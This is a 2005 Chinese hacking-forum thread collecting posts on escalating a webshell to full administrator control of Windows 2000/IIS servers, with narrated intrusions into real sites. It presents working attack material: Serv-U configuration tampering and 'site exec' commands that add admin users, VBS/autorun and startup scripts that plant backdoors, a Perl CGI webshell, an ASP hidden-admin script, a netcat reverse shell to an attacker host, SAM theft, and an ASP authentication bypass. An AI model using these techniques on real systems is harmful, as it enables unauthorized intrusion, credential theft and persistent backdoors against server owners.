以文本方式查看主题


-  电白社区  (http://www.525400.net/index.asp)

--  网络与安全  (http://www.525400.net/list.asp?boardid=76)

----  目前黑客入侵服务器提升权限总结  (http://www.525400.net/dispbbs.asp?boardid=76&id=3073)

--  作者:小飞

--  发布时间:2005-2-23 21:30:37


--  目前黑客入侵服务器提升权限总结

通过webshell获得admin全攻略

话说到花了九牛二虎的力气获得了一个webshell,
当然还想继续获得整个服务器的admin权限,正如不想得到admin的不是好黑客~
嘻嘻~~好跟我来,看看有什么可以利用的来提升权限
****************************************************************************
第一
如果服务器上有装了pcanywhere服务端,管理员为了管理方便
也给了我们方便,到系统盘的Documents and Settings/All Us
ers/Application Data/Symantec/pcAnywhere/中下载*.cif本地
破解就使用pcanywhere连接就ok了
****************************************************************************
第二
有很多小黑问我这么把webshell的iis user权限提升
一般服务器的管理都是本机设计完毕然后上传到空间里,那么就会用到ftp,服务
器使用最多的就是servu
那么我们就利用servu来提升权限
通过servu提升权限需要servu安装目录可写~




好开始把,首先通过webshell访问servu安装文件夹下的ServUDaemon.ini把他下载
下来,然后在本机上安装一个servu把ServUDaemon.ini放到本地安装文件夹下覆盖,
启动servu添加了一个用户,设置为系统管理员,目录C://,具有可执行权限
然后去servu安装目录里把ServUDaemon.ini更换服务器上的。




用我新建的用户和密码连接~
好的,还是连上了

ftp
ftp>open ip 
Connected to ip.
220 Serv-U FTP Server v5.0.0.4 for WinSock ready...
User (ip:(none)): id                       //刚才添加的用户
331 User name okay, please send complete E-mail address as password.
Password:password                          //密码
230 User logged in, proceed.
ftp> cd winnt                             //进入win2k的winnt目录
250 Directory changed to /WINNT
ftp>cd system32                            //进入system32目录
250 Directory changed to /WINNT/system32
ftp>quote site exec net.exe user rover rover1234 /add //利用系统的net.exe


文件加用户。




如果提示没有权限,那我们就
把后门(server.exe) 传他system32目录
然后写一个VBs教本

set wshshell=createobject ("wscript.shell") 
a=wshshell.run ("cmd.exe /c net user user pass /add",0) 
b=wshshell.run ("cmd.exe /c net localgroup Administrators user /add",0)
b=wshshell.run ("cmd.exe /c server.exe",0)




存为xx.vbe
这个教本的作用是建立user用户密码为pass
并且提升为管理员
然后执行system32目录下的server.exe
把这个教本传他 C://Documents and Settings//All Users//「开始」菜单//程序//启动
目录
这样管理员只要一登陆就会执行那个教本.
接下来就是等了.等他登陆.
****************************************************************************
第三
就是先检查有什么系统服务,或者随系统启动自动启动的程序和管理员经常使用的软件,
比如诺顿,VAdministrator,金山,瑞星,WinRAR甚至QQ之类的,是否可以写,如果可以就修改其程序,
绑定一个批处理或者VBS,然后还是等待服务器重启。
****************************************************************************
第四
查找conn和config ,pass这类型的文件看能否得到sa或者mysql的相关密码,可能会有所
收获等等。
****************************************************************************
第五
使用Flashfxp也能提升权限,但是成功率就看你自己的运气了
首先找到FlashFXP文件夹,打开(编辑)Sites. dat,这个文件这是什么东西密码和用户名,
而且密码是加了密的。
如果我把这些文件copy回本地也就是我的计算机中,替换我本地的相应文件。然后会发现
打开flashfxp在站点中打开站点管理器一样。又可以添加N多肉鸡啦~~嘻嘻~




唔??不对啊,是来提升权限的啊,晕,接着来别半途而废。
大家看看对方管理员的这站点管理器,有用户名和密码,密码是星号的。经过用xp星号密码
查看器查看,然后和Sites.dat中加密了密码做比较发现并未加密而是查到的密码是明文显示,
然后最终把这个网站管理员的密码从这堆东西中找
出来。那么下一步就可以链接这些新的服务器啦~~
经过测试只要把含有密码和用户名的Sites.dat文件替换到本地相应的文件就可以在本地
还原对方管理员的各个站点的密码。
****************************************************************************
第五




WIN2K+IIS5.0默认情况下应用程序保护选项是“中(共用的)”,这时IIS加载isapi是用的
iwam_computername用户身份执行。
但默认情况下WIN2K+IIS5对于一些特殊isapi又要以system身份加载。win2k+iis5 、
win2k+iis5+sp1、win2k+iis5+sp2都是简单的判断isapi的文件名,并且没有做目录限制,
以SYSTEM权限加载的isapi有:
1、 idq.dll
2、 httpext.dll
3、 httpodbc.dll
4、 ssinc.dll
5、 msw3prt.dll
6、 author.dll
7、 admin.dll
8、 shtml.dll
9、 sspifilt.dll
10、compfilt.dll
11、pwsdata.dll
12、md5filt.dll
13、fpexedll.dll




所以利用这很容易得到SYSTEM权限。并且判断文件名的时候有个bug,比如请求/scripts/test
%81%5cssinc.dll也将会认为是请求的ssinc.dll,就是分离文件路径的时候没有考虑到双字节的
远东版问题。ssinc.dll在处理包含文件路径的时候也有一个问题,就是"/"、"//"只识别了一个
"/",所以如果请求里面使用"//",就会错误的处理包含文件路径,有可能泄露东西或者出现权限
漏洞,这种漏洞很多别的地方( php、asp等)也还存在。




加载这些isapi不是单以文件名做依据了,而是加了路径,应该是修正了此问题。
一般默认情况下是:


1、 idq.dll             d://winnt//system32//idq.dll
2、 httpext.dll         d://winnt//system32//inetsrv//httpext.dll
3、 httpodbc.dll        d://winnt//system32//inetsrv//httpodbc.dll
4、 ssinc.dll           d://winnt//system32//inrtsrv//ssinc.dll
5、 msw3prt.dll         d://winnt//system32//msw3prt.dll
6、 author.dll          D://Program Files//Common Files//Microsoft Shared//web server extensions//40//isapi//_vti_aut//author.dll
7、 admin.dll           D://Program Files//Common Files//Microsoft Shared//web server extensions//40//isapi//_vti_adm//admin.dll
8、 shtml.dll           D://Program Files//Common Files//Microsoft Shared//web server extensions//40//isapi//shtml.dll
9、 sspifilt.dll        d://winnt//system32//inetsrv//sspifilt.dll
10、compfilt.dll        d://winnt//system32//inetsrv//compfilt.dll
11、pwsdata.dll         d://winnt//system32//inetsrv//pwsdata.dll
12、md5filt.dll         d://winnt//system32//inetsrv//md5filt.dll
13、fpexedll.dll        D://Program Files//Common Files//Microsoft Shared//web server extensions//40//bin//fpexedll.dll


正常情况下这些路径都guest不能写,但如果配置不好,这些路径iis user能够写了就一样可以提升权限了




可以把ISAPIHack.dll上传到IIS的可执行目录,文件名可叫ssinc.dll或者admin.dll等(上面列的13个文件名之一)。
然后等待IIS重启加载此dll,就可以获得权限了
****************************************************************************
第六




下载系统的 %windir%//repair//sam.*(WinNT 4下是sam._ 而Windows 2000下是sam)文件,
然后用L0pht等软件进行破解,只要能拿到,肯花时间,就一定可以破解。
****************************************************************************
第七
PipeUpAdmin(Windows 2000下), 在本机运行可以把当前用户帐号加入管理员组。普通用户
和Guests组用户都可以成功运行。
****************************************************************************
第八
Serv-u Ftp Server 本地权限提升漏洞:
很多主机的C://Documents and Settings//All Users// Documents目录以
及下边几个子目录Documents没有设置权限,导致可以在这个目录上传并
运行Exp.
直接上传了serv-u local exploit 和nc,
并且把serv-u的本地提升权限的名字命名为su.exe
文件就放在C://Documents and Settings//All Users// Documents,
然后我们用su.exe直接建立用户,也可以反弹一个shell过来的。
具体命令:
建立用户: serv-u.exe "cmd"  
>USER xl
>PASS 111111




反弹shell: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"


--  作者:小飞

--  发布时间:2005-2-23 21:31:00


--  

WEBSHELL权限提升

动网上传漏洞,相信大家拿下不少肉鸡吧,但是都是WEBSHELL,不能拿到系统权限,要如何拿到系统权限呢?这正是我们这次要讨论的内容
OK,进入我的WEBSHELL              
啊哈,不错,双CPU,速度应该跟的上,不拿下你我怎么甘心啊
输入密码,进入到里面看看,有什么好东西没有,翻了下,好像也没有什么特别的东西,看看能不能进到其他的盘符,点了下C盘,不错不错,可以进去,这样提升就大有希望了
一 serv-u提升
OK,看看他的PROGRAME里面有些什么程序,哦,有SERV-U,记得有次看到SERV-U有默认的用户名和密码,但是监听的端口是43958,而且是只有本地才能访问的,但是我们有端口转发工具的啊,不怕。先看看他的SERV-U的版本是多少,telnet XXX.XXX.XXX.XXX 21
显示竟然是3.0的,唉,不得不说这个管理员真的不称职。后来完毕后扫描了下,也只有FTP的洞没有补。既然是这样,我们就开始我们的提升权限了
上传FPIPE,端口转发工具, 图三
在运行CMD命令里输入d://wwwroot//fpipe.exe -v -l 81 -r 43958 127.0.0.1 意思是把本机的43598端口转发到81端口
然后打开我们自己机子上的SERV-U,点Serv-U服务器,点菜单栏上的的服务器,点新建服务器,然后输入IP,输入端口,记得端口是刚刚我们转发的81端口。服务名称随便你喜欢,怎么样都行。然后是用户名:LocalAdministrator  密码:#l@$ak#.lk;0@P   (密码都是字母)
确定,然后点刚刚建的服务器,然后就可以看到已有的用户,自己新建一个用户,把所有权限加上。也不锁定根目录
接下来就是登陆了,登陆FTP一定要在CMD下登陆,
进入后一般命令和DOS一样,添加用户的时候
ftp>quote site exec net.exe user hk pass /add
ftp>quote site exec net.exe localgroup administrators hk/add
如果对方开了3389的话,就不用我教你怎么做了,没开的话,新建立IPC连接,在上传木马或者是开启3389的工具

auto.ini 加 SHELL.VBS
autorun.inf
[autorun] 
open=shell.vbs
shell.vbs
dim wsh  
set wsh=CreateObject("WScript.Shell")
wsh.run "net user guest /active:yes",0
wsh.run "net user guest 520ls",0
wsh.run "net localgroup administrators guest /add",0
wsh.run "net user hkbme 520ls /add",0
wsh.run "net localgroup administrators hkbme /add",0
wsh.run "cmd.exe /c del autorun.inf",0
wsh.run "cmd.exe /c del shell.vbs",0


但是这样要可以访问到对方的根目录。将这两个文件放到对方硬盘的根目录下。当然你也可以直接执行木马程序,还要一个木马程序,但是语句就和最后两句一样,通过CMD执行木马程序

Folder.htt与desktop.ini
将改写的Folder.htt与desktop.ini,还有你的木马或者是VBS或者是什么,放到对方管理员最可能浏览的目录下,觉得一个不够,可以多放几个
Folder.htt添加代码
<OBJECT ID=”RUNIT” WIDTH=0 HEIGHT=0 TYPE=”application/x-oleobject” CODEBASE=”你的后门文件名”>
</OBJECT>
但是后门和这两个文件必须要放到一块,有点问题,可以结合启动VBS,运行结束后,删除上传的后门.就是CODEBASE="shell.vbs".shell写法如上


replace
替换法,可以替换正在执行的文件。用这个几乎可以马上得到权限,但是我没有做过试验,可以试下,将对方正在执行的文件替换为和它文件名一样的,捆绑了木马的。为什么不直接替换木马呢?如果替换的是关键程序,那不是就直接挂了?所以还是捆绑好点
格式
REPLACE [drive1:][path1]filename [drive2:][path2] [/A]

[/R] [/W]

REPLACE [drive1:][path1]filename [drive2:][path2]

[/R] [/S] [/W]

 

 [drive1:][path1]filename 指定源文件。
 [drive2:][path2] 指定要替换文件的
              目录。
 /A 把新文件加入目标目录。不能和
              /S 或 /U 命令行开关搭配使用。
 /P 替换文件或加入源文件之前会先提示您
              进行确认。
 /R 替换只读文件以及未受保护的
              文件。
 /S 替换目标目录中所有子目录的文件。
              不能与 /A 命令选项
              搭配使用。
 /W 等您插入磁盘以后再运行。
 /U 只会替换或更新比源文件日期早的文件。
              不能与 /A 命令行开关搭配使用
这个命令没有试验过,看能不能替换不能访问的文件夹下的文件,大家可以试验下

脚本
编写一个启动/关机脚本配置文件scripts.ini,这个文件名是固定的,不能改变。内容如下:

[Startup]
0CmdLine=a.bat
0Parameters=

将文件scripts.ini保存到“C://winnt//system32//GroupPolicy//Machine//Scripts”
A.BAT的内容可以是NET USER yonghu mima
也可以是NET USER ADMINistrator  XXX
这样可以恢复你想要得任意用户名的密码,也可以自己增加新的用户,但是要依赖重启,还有就是对SYSTEM32有写的权限

SAM
如果可以访问对方的SYSTEM32的话,删除对方的SAM文件,等他重启以后就是ADMIN用户密码为空
突然又有了想法,可以用REPLACE命令替换的吗,可以把你的SAM文件提取出来,上传到他的任意目录下,然后替换。不过不知道如果对SYSTEM32没有权限访问的话,能不能实现替换


--  作者:小飞

--  发布时间:2005-2-23 21:31:14


--  

使用FlashFXP来提升权限 最近各位一定得到不少肉鸡吧:),从前段时间的动网的upfile漏洞, 动力文章系统最新漏洞到first see发现的动网sql版本的一个超级大漏洞。有人一定忙的不易乐乎,大家的方法也不过是使用一下asp脚本的后门罢了。至于提 升权限的问题 呵呵,很少有人能作一口气完成。关键还是在提升权限上做个问题上,不少服务器设置的很BT,你的asp木马可能都用不了,还那里 来的提升啊。我们得到webshell也就是个低级别的用户的权限,各种提升权限方法是可谓五花八门啊,如何提升就看你自己的妙 招了。

其一,如果服务器上有装了pcanywhere服务端,管理员为了便于管理也给了我们方便,到系统盘的Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/中下载*.cif本地破解就使用pcanywhere连接就ok了。

其二,如果对方有Serv-U大家不要骂我啊,通过修改ServUDaemon.ini和fpipe这软件提升权限应该是不成问 题吧。

其三,通过替换系统服务来提升。

其四,查找conn和config这类型的文件看能否得到sa或者mysql的相关密码,可能会有所收获等等。

本人在一次无聊的入侵过程中发现了这个方法,使用Flashfxp也能提升权限,但是成功率高不高就看你自己的运气了:)

本人在www.xxx.com 通过bbs得到了一个webshell,放了个小马(现在海阳的名气太大了偶不敢放),而且已经将一段代码插入了N个文件中,够 黑吧。提升权限没时间做。在我放假回家后,一看我晕bbs升级到动网sp2了我放的小马也被K了,人家的BBS是access版 本的。郁闷啊!突然想起我将一个页面插入了asp的后门,看看还有没有希望了。输入www.xxx.com/xx.asp?id =1 好家伙,还在!高兴ing

图1

于是上传了一个asp的脚本的后门,怎么提升权限呢?

在这个网站的主机上游荡了N分钟,在C:// Program Files下发现了FlashFXP文件夹(跟我一样使用这个软件自己心里暗想)图2,于是就打了了Sites. dat这个文件(编辑)这是什么东西密码和用户名,而且密码是加了密的。

如果我把这些文件copy回本地也就是我的计算机中,替换我本地的相应文件会怎么样呢?

于是我就将Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak几个文件下载到我的计算机中替换了我电脑中flashfxp文件夹的相应文件。打开flashfxp 在站点中打开站点管理器一项。乖 乖发财了

对方管理员通过flashfxp连接的各个站点都在图3,点击连接。通过了于是我们又有了一堆肉鸡,我们有ftp权限。上传脚本 木马~ 呵呵。

说了半天这提升权限的事情一点没讲啊

不要急,大家看看对方管理员的这站点管理器,有用户名和密码,密码是星号的。可惜啊!

又想起了在Sites.dat中也显示了密码和用户名,而且密码是加密的。

现在的星号密码会不会也是加了密的?看看就行了呗。

怎么看? 菜鸟了吧 手头有个不错的查看星号的软件,就是xp星号密码查看器,通过查看跟Sites.dat中加密了密码做比较。看图4和图5 的比较 很显然在站点管理器中查看到的密码是明文显示的。发财了吧

下一步就是使用xp星号密码查看器这个软件来提取密码和用户名。看者这些复杂的密码,还真有点怀念当年玩sniff的时光。呵呵

密码为:b69ujkq6 hyndai790 s584p*fv4-c+ 98cq3jk4 3-8*ef./2z5+

用户名:bn7865t nilei75 qm/-g57+3kn qm/-g57+3kn 5.e*82/+69

(上述部分密码和用户名已经作了必要的修改)

这么多的信息,按社会工程学的概念来说,没有管理员的密码。打死我也不相信。最终我得到了这个网站管理员的密码从这堆东西中找到 的。

我想这个问题应该反馈到flashfxp官方,让他们在下个版本中修正这个漏洞或者说是错误。经过后来测试只要把含有密码和用户 名的Sites.dat文件替换到本地相应的文件就可以在本地还原对方管理员的各个站点的密码。希望大家在入侵的时候遇到fla shfxp的时候能想到这个方法,至少也可以得到一堆新的肉鸡。不防试试?希望能给大家渗透带来帮助。 <!-- Message body /'/'"" -->



--  作者:小飞

--  发布时间:2005-2-23 21:31:29


--  

将asp权限提到最高by: cnqing from:http://friend.91eb.com 本来是要写个提权asp木马的,可惜时间不是太多功底也不是太深。先把原理方法告诉大家好了。简单说说,说的太麻烦没有必要。懂了就行。

原理:

asp文件的教本解释是由asp.dll运行的。由dllhost.exe启动的。身分是IWAN_NAME。若是把asp.dll放到inprocesslsapiapps中那它就是由inetifo.exe直接启动。身份是system

方法:

第一步。

得到inprocesslsapiapps内容,用命令"cscript C://Inetpub//AdminScripts//adsutil.vbs get w3svc/inprocessisapiapps"。将得到的一组dll复制下来。

第二步

写一个bat内容为"cscript C://Inetpub//AdminScripts//adsutil vbs set w3svc/inprpocessisapiapps "C://Inetpub//AdminScripts//asp.dll" ·····

省略号为复制下的内容。中间用空格分开不要带回车符

最后运行这个bat就行了。

例如:

我用"cscript C://Inetpub//AdminScripts//adsutil.vbs get w3svc/inprocessisapiapps"得到 

"c://winnt//system32//inetsrv//httpext.dll" 
"c://winnt//system32//inetsrv//httpodbc.dll" 
"C://WINNT//system32//inetsrv//ssinc.dll" 
"C://WINNT//System32//msw3prt.dll" 
"C://Program Files//Common Files//Microsoft Shared//Web Server Extensions//isapi//_vti_aut//author.dll" 
"C://Program Files//Common Files//Microsoft Shared//Web Server Extensions//isapi//_vti_adm//admin.dll" 
"C://Program Files//Common Files//Microsoft Shared//Web Server Extensions//isapi//shtml.dll"


那么你的bat就应该是: 


cscript C://Inetpub//AdminScripts//adsutil vbs set w3svc/inprpocessisapiapps "C://Inetpub//AdminScripts//asp.dll" "c://winnt//system32//inetsrv//httpext.dll" "c://winnt//system32//inetsrv//httpodbc.dll" "C://WINNT//system32//inetsrv//ssinc.dll" "C://WINNT//System32//msw3prt.dll" "C://Program Files//Common Files//Microsoft Shared//Web Server Extensions//isapi//_vti_aut//author.dll" "C://Program Files//Common Files//Microsoft Shared//Web Server Extensions//isapi//_vti_adm//admin.dll" "C://Program Files//Common Files//Microsoft Shared//Web Server Extensions//isapi//shtml.dll"


已测试成功!!

--  作者:小飞

--  发布时间:2005-2-23 21:31:44


--  


利用%5c绕过验证

---------------------------------------
lake2(http://mrhupo.126.com)2004-11-27---------------------------------------说到%5c,你是不是想起了当前流行的那个%5c暴库漏洞,呵呵,本文就是对%5c利用的探索(呵呵,当然有我提出的新东东,或许对你有帮助哦^_^)。好,我们先追根溯源,找到那个漏洞的老底。看看绿盟2001年的漏洞公告:http://www.nsfocus.net/index.php?ac...iew&bug_id=1429N年以前利用这个漏洞可以实现目录遍历,虽然微软出了补丁,不过好像补丁是用来限制iis只能访问虚拟目录的,所以漏洞还是存在,只不过利用方式变了。对iis来说,提交一个含有%5c的url能够找到文件,但是该文件里以相对路径引用的其他文件却找不到了(%5c是//的url编码,iis跳转到上一级目录去找,当然找不到;头晕了吧,哈哈,我也头晕啊)。

后来这个漏洞就被牛人挖掘出来了,也就是传说中的%5c暴库:由于连接数据库的文件引用的相对路径,提交%5c找不到文件,所以导致出错,iis就会老老实实的说出数据库的路径(不明白?找google)。

一个偶然的机会我发现还可以利用%5c绕过asp的验证;当我们暴库失败的时候不妨试试。

废话少说,看下面的代码:

<!--#INCLUDE file="conn.asp" -->
<%
guest_user=trim(request("guest_user"))
guest_password=trim(request("guest_password"))
Set rs= Server.CreateObject("ADODB.Recordset")
sql="select * from admin where id=1" 
rs.open sql,conn,3,2
readuser=rs("guest_user")
readpassword=rs("guest_password")
if readuser<>guest_user or readpassword<>guest_password then
response.write "请输入正确地管理员密码!"
response.end
else
session("admin")=1 /'登陆后写入seesion中保存
response.write("登陆成功,请返回信息页")
end if
%>




看到没有,要想通过验证必须让数据库里的用户名密码与提交的一致;想到什么?让我们再看看数据库连接文件代码:

<%
on error resume next
set conn=server.createobject("adodb.connection")
DBPath = Server.MapPath("guestbook.asp")
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
%>



啊,有容错语句不能暴库!等等,如果提交%5c数据库找不到,由于容错,所以程序会继续执行,那么说来从数据库得到的用户名密码皆为空(想想有时暴库失败是不是看到空空的框架,因为数据都是空嘛),哈哈,这样我们就绕过验证了!

知道怎么做了吧,把登陆页面保存到本地,修改提交的url,把最后一个/改成%5c,用户名密码用空格(有的程序会检查用户名密码是否为空,空格会被程序过滤),提交,就ok了。

诶,各位不要以为我自己没事写段代码来捣鼓,实际上这个是我们学校一个高手做的留言板程序,就挂在学校的主页,呵呵。

既然弄懂了原理,当然要找实际漏洞啦,自然是拿大名鼎鼎的“洞”网论坛开刀。不过失败了,因为它的数据库连接文件里有这么一段:

If Err Then
err.Clear
Set Conn = Nothing
Response.Write "数据库连接出错,请检查连接字串。"
Response.End
End If

数据库找不到程序就结束了,呵呵,空欢喜一场。

接着又去down了bbsxp论坛,打开数据库连接文件,晕,根本没有容错语句;呵呵,不过可以暴库哦。

我又不是BT,所以不去找事了,写篇文章,算是给各位高手提供资料吧。

总结一下这个攻击方法成功的条件:1、数据库连接用的相对路径且仅有简单的容错语句;2、服务器iis版本为4或5;3、程序里不检查空字符或者检查时不过滤空格而比较时过滤空格;4、程序不能在一级目录

至于防范,呵呵,既然攻击条件知道了,防范措施自然也出来了^_^


--  作者:小飞

--  发布时间:2005-2-23 21:32:05


--  

提升权限终极技巧 作者:WekweN http://www.wrsky.com

本篇文章结合了许多高手提升权限的技巧和自己的一些想法


当我们取得一个webshell时候,下一部要做的就是提升权限


个人总结如下:

1: C://Documents and Settings//All Users//Application Data//Symantec//pcAnywhere看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,得到pcAnywhere密码,登陆

ps: 破解工具本站已提供。请自己Search一下!


2.C://WINNT//system32//config进这里下它的SAM,破解用户的密码

用到破解sam密码的软件有LC,SAMinside


3.C://Documents and Settings//All Users//「开始」菜单//程序看这里能跳转不,我们从这里可以获取好多有用的信息

可以看见好多快捷方式,我们一般选择Serv-U的,然后本地查看属性,知道路径后,看能否跳转

进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空

[USER=WekweN|1]
Password=
HomeDir=c:TimeOut=600
Maintenance=System
Access1=C://|RWAMELCDP
Access1=d://|RWAMELCDP
Access1=f://|RWAMELCDP
SKEYValues=

这个用户具有最高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限



4.c://winnt//system32//inetsrv//data就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,然后执行


5.看能否跳转到如下目录

c://php, 用phpspy
c://prel,有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell
#!/usr/bin/perl
binmode(STDOUT);
syswrite(STDOUT, "Content-type: text/html//r//n//r//n", 27);
$_ = $ENV{QUERY_STRING};
s/%20/ /ig;
s/%2f/ig;
$execthis = $_;
syswrite(STDOUT, "<HTML><PRE>//r//n", 13);
open(STDERR, ">&STDOUT") || die "Can/'t redirect STDERR";
system($execthis);
syswrite(STDOUT, "//r//n</PRE></HTML>//r//n", 17);
close(STDERR);
close(STDOUT);
exit;

保存为cgi执行,

如果不行,可以试试 pl 扩展呢,把刚才的 cgi 文件改为 pl 文件,提交 http://anyhost//cmd.pl?dir 显示"拒绝访问",表示可以执行了!马上提交:先的上传个su.exe(ser-u提升权限的工具)到 prel的bin目录

http://anyhost//cmd.pl?c//perl//bin//su.exe

返回:

Serv-u >3.x Local Exploit by xiaolu


USAGE: serv-u.exe "command"


Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"

现在是 IUSR 权限,提交: 

http://anyhost//cmd.pl?c//perl//bin//su.exe "cacls.exe c: /E /T /G everyone:F" 
http://anyhost//cmd.pl?c//perl//bin//su.exe "cacls.exe d: /E /T /G everyone:F" 
http://anyhost//cmd.pl?c//perl//bin//su.exe "cacls.exe e: /E /T /G everyone:F" 
http://anyhost//cmd.pl?c//perl//bin//su.exe "cacls.exe f: /E /T /G everyone:F"


如果返回下面的信息,就表示成功了

Serv-u >3.x Local Exploit by xiaolu 

<220 Serv-U FTP Server v5.2 for WinSock ready... 

>USER LocalAdministrator 

<331 User name okay, need password. 

****************************************************** 

>PASS #l@$ak#.lk;0@P 

<230 User logged in, proceed. 

****************************************************** 

>SITE MAINTENANCE 

****************************************************** 

[+] Creating New Domain... 

<200-DomainID=2 

<220 Domain settings saved 

****************************************************** 

[+] Domain xl:2 created 

[+] Creating Evil User 

<200-User=xl 

200 User settings saved 

****************************************************** 

[+] Now Exploiting... 

>USER xl 

<331 User name okay, need password. 

****************************************************** 

>PASS 111111 

<230 User logged in, proceed. 

****************************************************** 

[+] Now Executing: cacls.exe c: /E /T /G everyone:F 

<220 Domain deleted

这样所有分区为everyone完全控制

现在我们把自己的用户提升为管理员:


http://anyhost//cmd.pl?c//perl//bin//su.exe " net localgroup administrators IUSR_anyhost /add"



6.可以成功运行"cscript C://Inetpub//AdminScripts//adsutil.vbs get w3svc/inprocessisapiapps"来提升权限

用这个cscript C://Inetpub//AdminScripts//adsutil.vbs get w3svc/inprocessisapiapps

查看有特权的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll

再将asp.dll加入特权一族

asp.dll是放在c://winnt//system32//inetsrv//asp.dll (不同的机子放的位置不一定一样)

我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C://WINNT//system32//idq.dll" "C://WINNT//system32//inetsrv//httpext.dll" "C://WINNT//system32//inetsrv//httpodbc.dll" "C://WINNT//system32//inetsrv//ssinc.dll" "C://WINNT//system32//msw3prt.dll""c://winnt//system32//inetsrv//asp.dll"

可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了


7.还可以用这段代码试提升,好象效果不明显

<%@codepage=936%><%Response.Expires=0 
on error resume next 
Session.TimeOut=50 
Server.ScriptTimeout=3000 
set lp=Server.createObject("WSCRIPT.NETWORK") 
oz="WinNT://"&lp.ComputerName 
Set ob=GetObject(oz) 
Set oe=GetObject(oz&"/Administrators,group") 
Set od=ob.create("user","WekweN$") 
od.SetPassword "WekweN" <-----密码
od.SetInfo 
Set of=GetObject(oz&"/WekweN$,user") 
oe.Add(of.ADsPath) 
Response.write "WekweN$ 超级帐号建立成功!"%>



用这段代码检查是否提升成功

<%@codepage=936%>
<%Response.Expires=0
on error resume next /'查找Administrators组帐号
Set tN=server.createObject("Wscript.Network")
Set objGroup=GetObject("WinNT://"&tN.ComputerName&"/Administrators,group")
For Each admin in objGroup.Members
Response.write admin.Name&"<br>"
Next
if err then
Response.write "不行啊:Wscript.Network"
end if
%>


8.C://Program Files//Java Web Start这里如果可以,一般很小,可以尝试用jsp的webshell,听说权限很小,本人没有遇见过。


9.最后了,如果主机设置很变态,可以试下在c://Documents and Settings//All Users//「开始」菜单//程序//启动"写入bat,vbs等木马。


等到主机重启或者你ddos逼它重启,来达到权限提升的目的。



总结起来说就是,找到有执行和写入的目录,管他什么目录,然后上传提升工具,最后执行,三个字"找" "上""执"


以上是本人的拙见,大家有什么好的方法多多分享

WekweN

04.12.12


--  作者:小飞

--  发布时间:2005-2-23 21:33:12


--  

如何绕过防火墙提升权限


本文讲的重点是webshell权限的提升和绕过防火墙,高手勿笑。

废话少说,咱们进入正题。

首先确定一下目标:http://www.sun***.com ,常见的虚拟主机。利用Upfile的漏洞相信大家获得webshell不难。我们这次获得这个webshell,不是DVBBS,而是自由动力3.6的软件上传过滤不严。网站http://www.sun***.com/lemon/Index.asp是自由动力3.6文章系统。Xr运用WinHex.exe和WSockExpert.exe上传一个网页木马newmm.asp,用过动鲨的door.exe的人都知道,这个是上传asp木马内容的。于是,上传海洋2005a,成功获得webshell。

测试一下权限,在cmd里运行set,获得主机一些信息,系统盘是D盘,也说明了我们的webshell有运行权限的。那我们看看C盘有什么呢?难道是双系统?浏览后发现没有什么系统文件,只有一些垃圾文件,晕死。没关系,再来检查一下,虚拟主机都有serv-u的,这台也不例外,是5.0.0.8的。呵呵,是有本地溢出的呀,挖哈哈。

思路:上传serv-u本地溢出文件srv.exe和nc.exe利用nc来反连接获得系统shell。大家是不是发现海洋2005a那个上传的组件不好用(反正我总遇到这个问题),没关系,用rain改的一个无组件上传,一共有3个文件,up.htm, upload.asp和uploadclass.asp。upload.asp和uploadclass.asp上传到同一个文件夹,up.htm是本地用的,修改up.htm里的链接地址为:http://www.sun***.com/lemon/upload.asp就可以上传了。

传上了srv.exe和nc.exe在H://long//sun***//lemon(网站目录)后,发现没有运行权限。没关系,根据经验,一般系统下D://Documents and Settings//All Users//是应该有运行权限的。于是想把文件copy过去,但是发现我们的webshell没有对D盘写的权限,晕死。

可以浏览D://program files//serv-u//ServUDaemon.ini,不能改,难道要破解serv-u的密码,晕,不想。

不可以这么就泄气了,我突然想到为什么系统不放在C盘了,难道C盘是FAT32分区的?(后来证明了我们的想法。这里说一下,如果主机有win98的系统盘,那里99%是FAT32分区的。我们还遇到过装有Ghost的主机,为了方便在DOS下备份,它的备份盘一般都是FAT分区的。)如果系统盘是FAT32分区,则网站就没有什么安全性可言了。虽然C盘不是系统盘,但是我们有执行权限。呵呵,copy srv.exe和nc.exe到c://,运行 srv.exe “nc.exe –e cmd.exe 202.*.*.* 888”,这里的202.*.*.*是我们的肉鸡,在这之前我们已经在肉鸡上运行了nc –l –p 888。我们在学校内网里,没有公网ip,不爽-ing。

我们成功获得一个系统shell连上肉鸡。(看起来简单,其实这里我们也遇到过挫折,我们发现有些版本的nc居然没有-e这个参数,还以为全世界nc功能都一样。后来又发现不同版本的nc互连不成功,会出现乱码,没办法用。为此,上传n次,错误n次,傻了n次,后来终于成功了。做黑客还真得有耐心和恒心。)

高兴之余,我们仍不满足,因为这个shell实在是太慢了。于是,想用我们最常用的Radmin,其实管理员一按Alt+Ctrl+Del,看进程就能发现r_server了,但是还是喜欢用它,是因为不会被查杀。好了,上传admdll.dll,raddrv.dll,r_server.exe到H://long//sun***//lemon,再用刚才nc得到的shell把它们copy到d://winnt//system32//下,分别运行:r_server /install , net start r_server , r_server /pass:rain /save 。

一阵漫长的等待,终于显示成功了。兴冲冲用radmin连上去,发现连接失败。晕死,忘了有防火墙了。上传pslist和pskill上去,发现有backice,木马克星等。Kill掉他们虽然可以登陆,但服务器重启后还是不行,终不是长久之计呀。防火墙是不防21,80等端口的,于是,我们的思路又回到了serv-u上了。把他的ServUDaemon.ini下载下来,覆盖本机的ServUDaemon.ini,在本机的serv-u上添加一个用户名为xr,密码为rain的系统帐号,加上所有权限。再用老办法,上传,用shell写入D://program files//serv-u//里,覆盖掉原来的ServUDaemon.ini。虽然又等了n长时间,但是成功了,于是用flashfxp连上,发生530错误。郁闷,怎么又失败了。(根据经验这样应该就可以了,但为什么不行没有想通,请高手指点。)

